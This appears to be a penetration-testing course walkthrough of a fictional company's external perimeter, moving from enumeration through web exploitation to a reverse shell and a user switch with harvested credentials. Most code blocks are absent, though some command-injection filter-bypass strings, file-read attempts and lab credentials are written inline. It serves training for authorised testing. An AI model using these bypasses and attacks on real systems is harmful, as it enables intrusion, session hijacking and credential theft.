External Testing
External Information Gathering
We start with a quick initial Nmap scan against our target to get a lay of the land and see what we're dealing with. We ensure to save all scan output to the relevant subdirectory in our project directory.
We notice 11 ports open from our quick top 1,000 port TCP scan. It seems that we are dealing with a web server that is also running some additional services such as FTP, SSH, email (SMTP, pop3, and IMAP), DNS, and at least two web application-related ports.
In the meantime, we have been running a full port scan using the -A
flag (Aggressive scan options) to perform additional enumeration including OS detection, version scanning, and script scanning. Keep in mind that this is a more intrusive scan than just running with the -sV
flag for version scanning, and we should be careful to make sure that any scripts that are running with the script scan will not cause any issues.
The first thing we can see is that this is an Ubuntu host running an HTTP proxy of some kind. We can use this handy Nmap grep cheatsheet to "cut through the noise" and extract the most useful information from the scan. Let's pull out the running services and service numbers, so we have them handy for further investigation.
From these listening services, there are several things we can try immediately, but since we see DNS is present, let's try a DNS Zone Transfer to see if we can enumerate any valid subdomains for further exploration and expand our testing scope. We know from the scoping sheet that the primary domain is INLANEFREIGHT.LOCAL
, so let's see what we can find.
The zone transfer works, and we find 9 additional subdomains. In a real-world engagement, if a DNS Zone Transfer is not possible, we could enumerate subdomains in many ways. The DNSDumpster.com website is a quick bet. The Information Gathering - Web Edition
module lists several methods for Passive Subdomain Enumeration and Active Subdomain Enumeration.
If DNS were not in play, we could also perform vhost enumeration using a tool such as ffuf
. Let's try it here to see if we find anything else that the zone transfer missed. We'll use this dictionary list to help us, which is located at /opt/useful/seclists/Discovery/DNS/namelist.txt
on the Pwnbox.
To fuzz vhosts, we must first figure out what the response looks like for a non-existent vhost. We can choose anything we want here; we just want to provoke a response, so we should choose something that very likely does not exist.
Trying to specify defnotvalid
in the host header gives us a response size of 15157
. We can infer that this will be the same for any invalid vhost so let's work with ffuf
, using the -fs
flag to filter out responses with size 15157
since we know them to be invalid.
Comparing the results, we see one vhost that was not part of the results from the DNS Zone Transfer we performed.
Enumeration Results
From our initial enumeration, we noticed several interesting ports open that we will probe further in the next section. We also gathered several subdomains/vhosts. Let's add these to our /etc/hosts
file so we can investigate each further.
In the next section, we'll dig deeper into the Nmap scan results and see if we can find any directly exploitable or misconfigured services.
Service Enumeration & Exploitation
Listening Services
Our Nmap scans uncovered a few interesting services:
Port 21: FTP
Port 22: SSH
Port 25: SMTP
Port 53: DNS
Port 80: HTTP
Ports 110/143/993/995: imap & pop3
Port 111: rpcbind
We already performed a DNS Zone Transfer during our initial information gathering, which yielded several subdomains that we'll dig into deeper later. Other DNS attacks aren't worth attempting in our current environment.
FTP
Let's start with FTP on port 21. The Nmap Aggressive Scan discovered that FTP anonymous login was possible. Let's confirm that manually.
Connecting with the anonymous
user and a blank password works. It does not look like we can access any interesting files besides one, and we also cannot change directories.
We are also unable to upload a file.
Other attacks, such as an FTP Bounce Attack, are unlikely, and we don't have any information about the internal network yet. Searching for public exploits for vsFTPd 3.0.3 only shows this PoC for a Remote Denial of Service
, which is out of the scope of our testing. Brute forcing won't help us here either since we don't know any usernames.
This looks like a dead end. Let's move on.
SSH
Next up is SSH. We'll start with a banner grab:
This shows us that the host is running OpenSSH version 8.2, which has no known vulnerabilities at the time of writing. We could try some password brute-forcing, but we don't have a list of valid usernames, so it would be a shot in the dark. It's also doubtful that we'd be able to brute-force the root password. We can try a few combos such as admin:admin
, root:toor
, admin:Welcome
, admin:Pass123
but have no success.
SSH looks like a dead end as well. Let's see what else we have.
Email Services
SMTP is interesting. We can consult the Attacking Email Services section of the Attacking Common Services
module for help. In a real-world assessment, we could use a website such as MXToolbox or the tool dig
to enumerate MX Records.
Let's do another scan against port 25 to look for misconfigurations.
Next, we'll check for any misconfigurations related to authentication. We can try to use the VRFY
command to enumerate system users.
We can see that the VRFY
command is not disabled, and we can use this to enumerate valid users. This could potentially be leveraged to gather a list of users we could use to mount a password brute-forcing attack against the FTP and SSH services and perhaps others. Though this is relatively low-risk, it's worth noting down as a Low
finding for our report as our clients should reduce their external attack surface as much as possible. If this is no valid business reason for this command to be enabled, then we should advise them to disable it.
We could attempt to enumerate more users with a tool such as smtp-user-enum to drive the point home and potentially find more users. It's typically not worth spending much time brute-forcing authentication for externally-facing services. This could cause a service disruption, so even if we can make a user list, we can try a few weak passwords and move on.
We could repeat this process with the EXPN
and RCPT TO
commands, but it won't yield anything additional.
The POP3
protocol can also be used for enumerating users depending on how it is set up. We can try to enumerate system users with the USER
command again, and if the server replies with +OK
, the user exists on the system. This doesn't work for us. Probing port 995, the SSL/TLS port for POP3 doesn't yield anything either.
The Footprinting module contains more information about common services and enumeration principles and is worth reviewing again after working through this section.
We'd want to look further at the client's email implementation in a real-world assessment. If they are using Office 365 or on-prem Exchange, we may be able to mount a password spraying attack that could yield access to email inboxes or potentially the internal network if we can use a valid email password to connect over VPN. We may also come across an Open Relay, which we could possibly abuse for Phishing by sending emails as made-up users or spoofing an email account to make an email look official and attempt to trick employees into entering credentials or executing a payload. Phishing is out of scope for this particular assessment and likely will be for most External Penetration Tests, so this type of vulnerability would be worth confirming and reporting if we come across it, but we should not go further than simple validation without checking with the client first. However, this could be extremely useful on a full-scope red team assessment.
We can check for it anyways but do not find an open relay which is good for our client!
Moving On
Port 111 is the rpcbind
service which should not be exposed externally, so we could write up a Low
finding for Unnecessary Exposed Services
or similar. This port can be probed to fingerprint the operating system or potentially gather information about available services. We can try to probe it with the rpcinfo command or Nmap. It works, but we do not get back anything useful. Again, worth noting down so the client is aware of what they are exposing but nothing else we can do with it.
It's worth consulting this HackTricks guide on Pentesting rpcbind for future awareness regarding this service.
The last port is port 80
, which, as we know, is the HTTP service. We know there are likely multiple web applications based on the subdomain and vhost enumeration we performed earlier. So, let's move on to web. We still don't have a foothold or much of anything aside from a handful of medium and low-risk findings. In modern environments, we rarely see externally exploitable services like a vulnerable FTP server or similar that will lead to remote code execution (RCE). Never say never, though. We have seen crazier things, so it is always worth exploring every possibility. Most organizations we face will be most susceptible to attack through their web applications as these often present a vast attack surface, so we'll typically spend most of our time during an External Penetration test enumerating and attacking web applications.
Web Enumeration & Exploitation
As mentioned in the previous section, web applications are where we usually spend most of our time during an External Penetration Test. They often present a vast attack surface and can suffer from many classes of vulnerabilities that can lead to remote code execution or sensitive data exposure, so we should be thorough with them. One thing to remember is that there is a difference between a Web Application Security Assessment (WASA)
and an External Penetration Test
. In a WASA, we are typically tasked with finding and reporting any and all vulnerabilities, no matter how mundane (i.e., a web server version in the HTTP response headers, a cookie missing the Secure or HttpOnly flag, etc.). We don't want to get bogged down with these types of findings during an External Penetration Test since we typically have a lot of ground to cover. The Scope of Work (SoW) document should clearly differentiate between the two assessment types. It should explicitly state that during an External Penetration Test, we will perform cursory
web application testing, looking for high-risk vulnerabilities. If we don't have many findings at all, we can dig into the web applications deeper, and we can always include a catch-all Best Practice Recommendation
or Informational
finding that lists out several common security-related HTTP response header issues that we see all the time, among other minor issues. This way, we've fulfilled the contract by going after the big issues such as SQL injection, unrestricted file upload, XSS, XXE, file inclusion attacks, command injections, etc., but covered ourselves with the informational finding in case the client comes back asking why we didn't report X.
Web Application Enumeration
The quickest and most efficient way to get through a bunch of web applications is using a tool such as EyeWitness to take screenshots of each web application as covered in the Attacking Common Applications
module in the Application Discovery & Enumeration section. This is particularly helpful if we have a massive scope for our assessment and browsing each web application one at a time is not feasible. In our case, we have 11
subdomains/vhosts (for now), so it's worth firing up EyeWitness to help us out as we want to be as efficient as possible to give the client the best possible assessment. This means speeding up any tasks that can be performed faster
and more efficiently without the possibility of missing things
. Automation is great, but if we're missing half of whatever we're going after, then the automation is doing more harm than good. Make sure you understand what your tools are doing, and periodically spot-check things to ensure your tools and any custom scripts are working as expected.
We can feed EyeWitness an Nmap .xml file or a Nessus scan, which is useful when we have a large scope with many open ports, which can often be the case during an Internal Penetration Test. In our case, we'll just use the -f
flag to give it the list of subdomains in a text file we enumerated earlier.
The EyeWitness results show us multiple very interesting hosts, any one of which could potentially be leveraged to gain a foothold into the internal network. Let's work through them one by one.
blog.inlanefreight.local
First up is the blog.inlanefreight.local
subdomain. At first glance, it looks promising. The site seems to be a forgotten Drupal install or perhaps a test site that was set up and never hardened. We can consult the Attacking Common Applications module for ideas.
Using cURL
, we can see that Drupal 9 is in use.
A quick Google search shows us that the current stable Drupal version intended for production is release 9.4, so we probably will have to get lucky and find some sort of misconfiguration such as a weak admin password to abuse built-in functionality or a vulnerable plugin. Well-known vulnerabilities such as Drupalgeddon 1-3
do not affect version 9.x of Drupal, so that's a dead-end. Trying to log in with a few weak password combinations such as admin:admin
, admin:Welcome1
, etc., do not bear fruit. Attempting to register a user also fails, so we move on to the next application.
We could note in our report that this Drupal instance looks like it's not in use and could be worth taking down to further reduce the overall external attack surface.
careers.inlanefreight.local
Next up is the careers subdomain. These types of sites often allow a user to register an account, upload a CV, and potentially a profile picture. This could be an interesting avenue of attack. Browsing first to the login page http://careers.inlanefreight.local/login
, we can try some common authentication bypasses and try fuzzing the login form to try to bypass authentication or provoke some sort of error message or time delay that would be indicative of a SQL injection. As always, we test a few weak password combinations such as admin:admin
. We should also always test login forms (and forgot password forms if they exist) for username enumeration, but none is apparent in this case.
The http://careers.inlanefreight.local/apply
page allows us to apply for a job and upload a CV. Testing this functionality shows that it allows any file type to upload, but the HTTP response does not show where the file is located after upload. Directory brute-forcing does not yield any interesting directories such as /files
or /uploads
that could house a web shell if we can successfully upload a malicious file.
It's always a good idea to test user registration functionality on any web applications we come across, as these can lead to all sorts of issues. In the HTB box Academy, it is possible to register on a web application and modify our role to that of an admin at registration time. This was inspired by an actual External Penetration Test finding where I was able to register on an internet-facing web application for as many as five different user roles. Once logged into that application, all sorts of IDOR vulnerabilities existed, resulting in broken authorization on many pages.
Let's go ahead and register an account at http://careers.inlanefreight.local/register
and look around. We register an account with bogus details: test@test.com
and the credentials pentester:Str0ngP@ssw0rd!
. Sometimes we'll need to use an actual email address to receive an activation link. We can use a disposable email service such as 10 Minute Mail not to clutter up our inbox or keep a dummy account with ProtonMail mail or similar just for testing purposes. You'll be happy you didn't use your actual email address the first time Burp Suite Active Scanner hits a form and sends you 1,000+ emails in rapid succession. Register with decently strong credentials, too. You don't want to introduce a security issue into the web application you're tasked with testing by registering with credentials such as test:test
that could potentially be left on the application long after the test is over (though we should, of course, list in an appendix of our report any modifications made during testing, even registering on a public-facing website).
Once registered, we can log in and browse around. We're greeted with our profile page at http://careers.inlanefreight.local/profile?id=9
. Attempting to fuzz the id
parameter for SQLi, command injection, file inclusion, XSS, etc., does not prove fruitful. The ID number itself is interesting. Tweaking this number shows us that we can access other users' profiles and see what jobs they applied to. This is a classic example of an Insecure Direct Object Reference (IDOR)
vulnerability and would definitely be worth reporting due to the potential for sensitive data exposure.
After exhausting all options here, we walk away with one decent reportable vulnerability to add to our findings list and move on to the next web application. We can use any directory brute-forcing tool here, but we'll go with Gobuster.
dev.inlanefreight.local
The web application at http://dev.inlanefreight.local
is simple yet catches the eye. Anything with dev
in the URL or name is interesting, as this could potentially be accidentally exposed and riddled with flaws/not production-ready. The application presents a simple login form titled Key Vault
. This looks like a homegrown password manager or similar and could lead to considerable data exposure if we can get in. Weak password combinations and authentication bypass payloads don't get us anywhere, so let's go back to the basics and look for other pages and directories. Let's try first with the common.txt
wordlist using .php
file extensions for the first run.
We get a few interesting hits. The files with a 403
forbidden error code typically mean that the files exist, but the webserver doesn't allow us to browse to them anonymously. The uploads
and upload.php
pages immediately call our attention. If we're able to upload a PHP web shell, chances are we can browse right to it in the /uploads
directory, which has directory listing enabled. We can note this down as a valid low-risk finding, Directory Listing Enabled
, and capture the necessary evidence to make report writing quick and painless. Browsing to /upload.php
gives us a 403 Forbidden
error message and nothing more, which is interesting because the status code is a 200 OK
success code. Let's dig into this deeper.
We'll need Burp Suite here to capture the request and see if we can figure out what's going on. If we capture the request and send it to Burp Repeater and then re-request the page using the OPTIONS
method, we see that various methods are allowed: GET,POST,PUT,TRACK,OPTIONS
. Cycling through the various options, each gives us a server error until we try the TRACK
method and see that the X-Custom-IP-Authorization:
header is set in the HTTP response. We can consult the Web Attacks modules on HTTP Verb Tampering
for a refresher on this attack type.
Playing around a bit with the request and adding the header X-Custom-IP-Authorization: 127.0.0.1
to the HTTP request in Burp Repeater and then requesting the page with the TRACK
method again yields an interesting result. We see what appears to be a file upload form in the HTTP response body.
If we right-click anywhere in the Response
window in Repeater
we can select show response in browser
, copy the resultant URL and request it in the browser we are using with the Burp proxy. A photo editing platform loads for us.
We can click on the Browse
button and attempt to upload a simple webshell with the following contents:
Save the file as 5351bf7271abaa2267e03c9ef6393f13.php
or something similar. It's a good practice to create random file names when uploading a web shell to a public-facing website so a random attacker doesn't happen upon it. In our case, we'd want to use something password protected or restricted to our IP address since directory listing is enabled, and anyone could browse to the /uploads
directory and find it. Attempting to upload the .php
file directly results in an error: "JPG, JPEG, PNG & GIF files are allowed.
", which shows that some weak client-side validation is likely in place. We can grab the POST request, send it to Repeater once again and try modifying the Content-Type:
header in the request to see if we can trick the application into accepting our file as valid. We'll try altering the header to Content-Type: image/png
to pass off our web shell as a valid PNG image file. It works! We get the following response: File uploaded /uploads/5351bf7271abaa2267e03c9ef6393f13.php
.
We can now use cURL
to interact with this web shell and execute commands on the web server.
Checking the host's IP addressing, it doesn't appear that we've landed inside the Inlanefreight internal network as the IP address is not within the internal network scope. This may just be a standalone web server, so we'll continue on.
From here, we can enumerate the host further, looking for sensitive data, note down another two findings: HTTP Verb Tampering
and Unrestricted File Upload
, and move on to the next host.
ir.inlanefreight.local
The next target in our list is http://ir.inlanefreight.local
, the company's Investor Relations Portal hosted with WordPress. For this we can consult the WordPress - Discovery & Enumeration section of the Attacking Common Applications
module. Let's fire up WPScan
and see what we can enumerate using the -ap
flag to enumerate all plugins.
From the scan, we can deduce the following bits of information:
The WordPress core version is the latest (6.0 at the time of writing)
The theme in use is
cbusiness-investment
The
b2i-investor-tools
plugin is installedThe
mail-masta
plugin is installed
The Mail Masta
plugin is an older plugin with several known vulnerabilities. We can use this exploit to read files on the underlying file system by leveraging a Local File Inclusion (LFI) vulnerability.
We can add another finding to our list: Local File Inclusion (LFI)
. Next, let's move on and see if we can enumerate WordPress users using WPScan
.
We find several users:
ilfreightwp
tom
james
john
Let's try to brute-force one of the account passwords using this wordlist from the SecLists
GitHub repo. Using WPScan
again, we get a hit for the ilfreightwp
account.
From here, we can browse to http://ir.inlanefreight.local/wp-login.php
and log in using the credentials ilfreightwp:password1
. Once logged in, we'll be directed to http://ir.inlanefreight.local/wp-admin/
where we can browse to http://ir.inlanefreight.local/wp-admin/theme-editor.php?file=404.php&theme=twentytwenty
to edit the 404.php file for the inactive theme Twenty Twenty
and add in a PHP web shell to get remote code execution. After editing this page and achieving code execution following the steps in the Attacking WordPress section of the Attacking Common Applications
module, we can record yet another finding for Weak WordPress Admin Credentials
and recommend that our client implement several hardening measures if they plan to leave this WordPress site exposed externally.
status.inlanefreight.local
This site looks like another forgotten one that shouldn't be exposed to the internet. It seems like it's some sort of internal application to search through logs. Entering a single quote ('
) throws a MySQL error message which indicates the presence of a SQL injection vulnerability: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
. We can exploit this manually using a payload such as:
This is an example of a SQL Injection UNION attack.
We can also use sqlmap to exploit this also. First, capture the POST request using Burp, save it to a file, and mark the searchitem
parameter with a *
so sqlmap knows where to inject.
Next, we run this through sqlmap as follows:
Next, we can enumerate the available databases and see that the status
database is particularly interesting:
Focusing on the status
database, we find that it has just two tables:
From here, we could attempt to dump all data from the status
database and record yet another finding, SQL Injection
. Try this out manually using the SQL Injection Fundamentals module as guidance and refer to the SQLMap Essentials module if you need help with the tool-based approach.
support.inlanefreight.local
Moving on, we browse the http://support.inlanefreight.local
site and see that it is an IT support portal. Support ticketing portals may allow us to engage with a live user and can sometimes lead to a client-side attack where we can hijack a user's session via a Cross-Site Scripting (XSS)
vulnerability. Browsing around the application, we find the /ticket.php
page where we can raise a support ticket. Let's see if we can trigger some type of user interaction. Fill out all details for a ticket and include the following in the Message
field:
Change the IP for your own and start a Netcat
listener on port 9000 (or whatever port you desire). Click the Send
button and check your listener for a callback to confirm the vulnerability.
This is an example of a Blind Cross-Site Scripting (XSS) attack. We can review methods for Blind XSS detection in the Cross-Site Scripting (XSS) module.
Now we need to figure out how we can steal an admin's cookie so we can log in and see what type of access we can get. We can do this by creating the following two files:
index.php
script.js
Next, start a PHP web server on your attack host as follows:
Finally, create a new ticket and submit the following in the message field:
We get a callback on our web server with an admin's session cookie:
Next, we can use a Firefox plugin such as Cookie-Editor to log in using the admin's session cookie.
Click on the save button to save the cookie named session
and click on Login
in the top right. If all is working as expected, we will be redirected to http://support.inlanefreight.local/dashboard.php
. Take some time and record yet another finding, Cross-Site Scripting (XSS)
, noting that the finding is high-risk because it can be used to steal an active admin's session and access the ticketing queue system. Consult the Cross-Site Scripting (XSS) module for a refresher on XSS and the various ways this class of vulnerabilities can be leveraged, including session hijacking.
tracking.inlanefreight.local
The site at http://tracking.inlanefreight.local/
allows us to enter a tracking number and receive a PDF showing the status of our order. The application takes user input and generates a PDF document. Upon PDF generation, we can see that the Tracking #:
field takes any input (not just numbers) that we specify in the search box before hitting the Track Now
button. If we insert a simple JavaScript payload such as <script>document.write('TESTING THIS')</script>
and click Track Now
, we see that the PDF is generated and the message TESTING THIS
is rendered, which seems to mean that the JavaScript code is executing when the webserver generates the document.
We notice that we can inject HTML as well. A simple payload such as <h1>test</h1>
will render in the Tracking #:
field upon PDF generation as well. Googling for something such as pdf HTML injection vulnerability
returns several interesting hits such as this post and this post discussing leveraging HTML injection, XSS, and SSRF for local file read. Now, while not covered in the Penetration Tester Job Role Path
, it is important to note that we will often come across new things during our assessments.
Dealing with The Unexpected
This is where the penetration tester mindset is key. We must be able to adapt, poke and prod, and take the information we find and apply our thought process to determine what is going on. After a bit of probing, we were able to deduce that the web application generates PDF reports, and we can control the input to one field that should only accept numbers, as it seems. Through a bit of research, we were able to identify a class of vulnerability that we may not be familiar with yet, but there is considerable research and documentation on. Many researchers publish extremely detailed research from their own assessments or bug bounties, and we can often use this as a guide to try to find similar issues. No two assessments are the same, but there are only so many possible web application technology stacks, so we are bound to see certain things over and over, and soon things that were new and difficult become second nature. It is worth checking out the Server-side Attacks module to learn more about SSRF and other server-side attacks.
Let's dig through some of these writeups and see if we can produce a similar result and gain local file read. Following this post, let's test for local file read using XMLHttpRequest (XHR) objects and also consulting this excellent post on local file read via XSS in dynamically generated PDFS. We can use this payload to test for file read, first trying for the /etc/passwd
file, which is world-readable and should confirm the vulnerability's existence.
We paste the payload into the search box and hit the Track Now
button and the newly generated PDF displays the file's contents back to us, so we have local file read!
It's worth reading these blog posts, studying this finding and its impact, and becoming familiar with this class of vulnerability. If we were to encounter something like this during a penetration test that we are unfamiliar with but seemed "off," we could refer to the Penetration Testing Process to perform an analysis of the situation. If we did our research and still could not uncover the vulnerability, we should keep detailed notes of what we've tried and our thought process and ask our peers and more senior members of our team for assistance. Pentest teams often have folks who specialize or are stronger in certain areas, so someone on the team has likely seen this or something similar.
Play around with this vulnerability some more and see what else you can gain access to. For now, we'll note down another high-risk finding, SSRF to Local File Read
, and move on.
vpn.inlanefreight.local
It's common to come across VPN and other remote access portals during a penetration testing engagement. This appears to be a Fortinet SSL VPN login portal. During testing, we confirmed that the version in use was not vulnerable to any known exploits. This could be an excellent candidate for password spraying in a real-world engagement, provided we take a careful and measured approach to avoid account lockout.
We try a few common/weak credential pairs but get the following error message: Access denied.
, so we can move on from here to the next application.
gitlab.inlanefreight.local
Many companies host their own GitLab instances and sometimes don't lock them down properly. As covered in the GitLab - Discovery & Enumeration section of the Attacking Common Applications
module, there are several steps that an admin can implement to limit access to a GitLab instance such as:
Requiring admin approval for new sign-ups
Configured lists of domains allowed for sign-ups
Configuring a deny list
Occasionally we will come across a GitLab instance that is not adequately secured. If we can gain access to a GitLab instance, it is worth digging around to see what type of data we can find. We may discover configuration files containing passwords, SSH keys, or other information that could lead to furthering our access. After registering, we can browse to /explore
to see what projects, if any, we have access to. We can see that we can access the shopdev2.inlanefreight.local
project, which gives us a hint to another subdomain that we did not uncover using the DNS Zone Transfer and likely could not find using subdomain brute-forcing.
Before exploring the new subdomain, we can record another high-risk finding: Misconfigured GitLab Instance
.
shopdev2.inlanefreight.local
Our enumeration of the GitLab instance led to another vhost, so let's first add it to our /etc/hosts
file so we can access it. Browsing to http://shopdev2.inlanefreight.local
, we're redirected to a /login.php
login page. Typical authentication bypasses don't get us anywhere, so we go back to the basics per the Attacking Common Applications
module Application Discovery & Enumeration section and try some weak credential pairs. Sometimes it's the simplest things that work (and yes, we do see this type of stuff in production, both internal AND external) and can log in with admin:admin
. Once logged in, we see some sort of online store for purchasing wholesale products. When we see dev
in a URL (especially external-facing), we can assume it is not production-ready and worth digging into, especially because of the comment Checkout Process not Implemented
near the bottom of the page.
We can test the search for injection vulnerabilities and search around for IDORs and other flaws but don't find anything particularly interesting. Let's test the purchasing flow, focusing on the shopping cart checkout process and capture the requests in Burp Suite. Add an item or two to the cart and browse to /cart.php
and click the I AGREE
button so we can analyze the request in Burp. Looking at Burp, we see that a POST
request is made with XML
in the body like so:
Think back to the module content, namely the Web Attacks module; this looks like a good candidate for XML External Entity (XXE) Injection
because the form seems to be sending data to the server in XML format. We try a few payloads and finally can achieve local file read to view the contents of the /etc/passwd
file with this payload:
Let's jot down another high-risk finding, XML External Entity (XXE) Injection
(we've got quite the list so far!), and move on to the last vhost/subdomain.
monitoring.inlanefreight.local
We discovered the monitoring
vhost earlier, so we won't repeat the process. We used ffuf, but this enumeration can also be performed with other tools. Give it a try with GoBuster
to become comfortable with more tools. Browsing to http://monitoring.inlanefreight.local
results in a redirect to /login.php
. We can try some authentication bypass payloads and common weak credential pairs but don't get anywhere, just receiving the Invalid Credentials!
error every time. Since this is a login form, it is worth exploring further so we can fuzz it a bit with Burp Intruder to see if we can provoke an error message indicative of a SQL injection vulnerability, but we are not successful.
An analysis of the POST request and response in Burp Suite does not yield anything interesting. At this point, we've exhausted nearly all possible web attacks and turn back to the module content, remembering the Login Brute Forcing module that focuses on the tool hydra
. This tool can be used to brute-force HTTP login forms, so let's give it a go. We'll use the same wordlist from the SecLists
GitHub repo as earlier.
We'll set up hydra
to perform the brute-forcing attack, specifying the Invalid Credentials!
error message to filter out invalid login attempts. We get a hit for the credential pair admin:12qwaszx
, a common "keyboard walk" password that is easy to remember but can be very easily brute-forced/cracked.
Once logged in, we are presented with some sort of monitoring console. If we type help
, we are presented with a list of commands. This seems like a restricted shell environment to perform limited tasks and something very dangerous that should not be exposed externally. The last class of vulnerabilities taught in the Penetration Tester Job Role Path
that we have not yet covered is Command Injections.
We walk through each of the commands. Trying cat /etc/passwd
does not work, so it does appear that we are indeed in a restricted environment. whoami
and date
provide us with some basic information. We don't want to reboot
the target and cause a service disruption. We are unable to cd
to other directories. Typing ls
shows us a few files that are likely stored in the directory that we are currently restricted to.
Looking through the files, we find an authentication service and also that we are inside a container. The last option in the list is connection_test
. Typing that in yields a Success
message and nothing more. Going back over to Burp Suite and proxying the request, we see that a GET
request is made to /ping.php
for the localhost IP 127.0.0.1
, and the HTTP response shows a single successful ping attack. We can infer that the /ping.php
script is running an operating command using a PHP function such as shell_exec(ping -c 1 127.0.0.1)
or perhaps similar using the system() function to execute a command. If this script is coded improperly, it could easily result in a command injection vulnerability, so let's try some common payloads.
There seems to be some sort of filtering in place because trying standard payloads like GET /ping.php?ip=%127.0.0.1;id
and GET /ping.php?ip=%127.0.0.1|id
result in an Invalid input
error, meaning there is probably a character blacklist in play. We can bypass this filter by using a line feed character %0A
(or new-line character) as our injection operator following the methodology discussed in the Bypassing Space Filters section. We can make a request appending the new-line character like so GET /ping.php?ip=127.0.0.1%0a
, and the ping is still successful, meaning the character is not blacklisted.
We've won the first battle, but there seems to be another type of filter in place, as trying something like GET /ping.php?ip=127.0.0.1%0aid
still results in an Invalid input
error. Next, we can play around with the command syntax and see that we can bypass the second filter using single quotes. Switching to cURL
, we can run the id
command as follows:
We have achieved command execution as the webdev
user. Digging around a bit more, we see that this host has multiple IP addresses, one of which places it inside the 172.16.8.0/23
network that was part of the initial scope. If we can gain stable access to this host, we may be able to pivot into the internal network and start attacking the Active Directory domain.
Our next challenge is finding a way to a reverse shell. We can run single commands, but anything with a space does not work. Back to the Bypassing Space Filters section of the Command Injections
module, we remember that we can use the ($IFS) Linux Environment Variable
to bypass space restrictions. We can combine this with the new-line character bypass and start enumerating ways to obtain a reverse shell. To aid us, let's take a look at the ping.php
file to get an understanding of what is being filtered so we can limit the amount of guesswork needed.
Switching back to Burp and making the request GET /ping.php?ip=127.0.0.1%0a'c'at${IFS}ping.php
, or similar, gives us the file contents, and we can work on beating the filter and finding a way to establish a reverse shell.
We can see that the majority of options for getting a reverse shell are filtered which will make things difficult, however one that is not is socat
. Socat is a versatile tool that can be used for catching shells, and even pivoting as we have seen in the Pivoting, Tunneling, and Port Forwarding module. Let's check and see if it's available to us on the system. Heading back to Burp and using the request GET /ping.php?ip=127.0.0.1%0a'w'h'i'ch${IFS}socat
shows us that it is on the system, located at /usr/bin/socat
.
Next Steps
Now that we've finally worked our way through all of the externally-facing services and web applications, we have a good idea as to our next steps. In the next section, we will work on establishing a reverse shell into the internal environment and escalating our privileges to establish some sort of persistence on the target host.
Initial Access
Now that we've thoroughly enumerated and attacked the external perimeter and uncovered a wealth of findings, we're ready to shift gears and focus on obtaining stable internal network access. Per the SoW document, if we can achieve an internal foothold, the client would like us to see how far we can go up to and including gaining Domain Admin level access
. In the last section, we worked hard on peeling apart the layers and finding web apps that led to early file read or remote code execution but didn't get us into the internal network. We left off with obtaining RCE on the monitoring.inlanefreight.local
application after a hard-fought battle against filters and blacklists set in place to try to prevent Command Injection
attacks.
Getting a Reverse Shell
As mentioned in the previous section, we can use Socat to establish a reverse shell connection. Our base command will be as follows, but we'll need to tweak it some to get past the filtering:
We can modify this command to give us a payload to catch a reverse shell.
Start a Netcat
listener on the port used in the Socat command (8443 here) and execute the above request in Burp Repeater. If all goes as intended, we will have a reverse shell as the webdev
user.
Next, we'll need to upgrade to an interactive TTY
. This post describes a few methods. We could use a method that was also covered in the Types of Shells section of the Getting Started
module, executing the well-known Python one-liner (python3 -c 'import pty; pty.spawn("/bin/bash")'
) to spawn a psuedo-terminal. But we're going to try something a bit different using Socat
. The reason for doing this is to get a proper terminal so we can run commands like su
, sudo
, ssh
, use command completion
, and open a text editor if needed
.
We'll start a Socat listener on our attack host.
Next, we'll execute a Socat one-liner on the target host.
If all goes as planned, we'll have a stable reverse shell connection on our Socat listener.
Now that we've got a stable reverse shell, we can start digging around the file system. The results of the id
command are immediately interesting. The Privileged Groups section of the Linux Privilege Escalation
module shows an example of users in the adm
group having rights to read ALL logs stored in /var/log
. Perhaps we can find something interesting there. We can use aureport to read audit logs on Linux systems, with the man page describing it as "aureport is a tool that produces summary reports of the audit system logs."
After running the command, type q
to return to our shell. From the above output, it looks like a user was trying to authenticate as the srvadm
user, and we have a potential credential pair srvadm:ILFreightnixadm!
. Using the su
command, we can authenticate as the srvadm
user.
Now that we've bypassed heavy filtering to achieve command injection, turned that code execution into a reverse shell, and escalated our privileges to another user, we don't want to lose access to this host. In the next section, we'll work towards achieving persistence, ideally after escalating privileges to root
.
Last updated